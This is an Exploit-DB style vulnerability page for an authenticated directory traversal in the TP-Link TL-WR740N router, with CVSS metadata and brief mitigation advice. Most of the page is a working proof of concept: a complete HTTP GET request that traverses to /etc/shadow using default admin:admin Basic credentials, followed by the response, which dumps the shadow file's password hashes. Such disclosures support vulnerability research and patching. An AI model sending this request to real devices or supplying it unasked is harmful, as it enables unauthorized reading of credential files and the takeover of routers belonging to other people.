TP-Link TL-WR740N - Authenticated Directory Transversal

vendor:

TL-WR740N

by:

Anish Feroz (Zeroxinn)

7.5

CVSS

HIGH

Authenticated Directory Transversal

CWE

Product Name: TL-WR740N

Affected Version From: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n

Affected Version To: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n

Patch Exists: NO

Related CWE:

CPE: h:tp-link:tl-wr740n

Metasploit:

Other Scripts:

Platforms Tested: TP-Link TL-WR740N

2023

TP-Link TL-WR740N – Authenticated Directory Transversal

This exploit allows an authenticated user to access files outside of the intended directory structure on the TP-Link TL-WR740N router. By sending a specially crafted GET request, the attacker can traverse directories and access sensitive files such as the /etc/shadow file, which contains hashed passwords.

Mitigation:

To mitigate this vulnerability, it is recommended to update the router firmware to the latest version provided by the vendor. Additionally, access to sensitive files should be restricted to authorized users only.

Source

Exploit-DB raw data:

# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal
# Date: 13/7/2023
# Exploit Author: Anish Feroz (Zeroxinn)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

---------------------------POC---------------------------

Request
-------

GET /help/../../../etc/shadow HTTP/1.1
Host: 192.168.0.1:8082
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Response
--------

HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::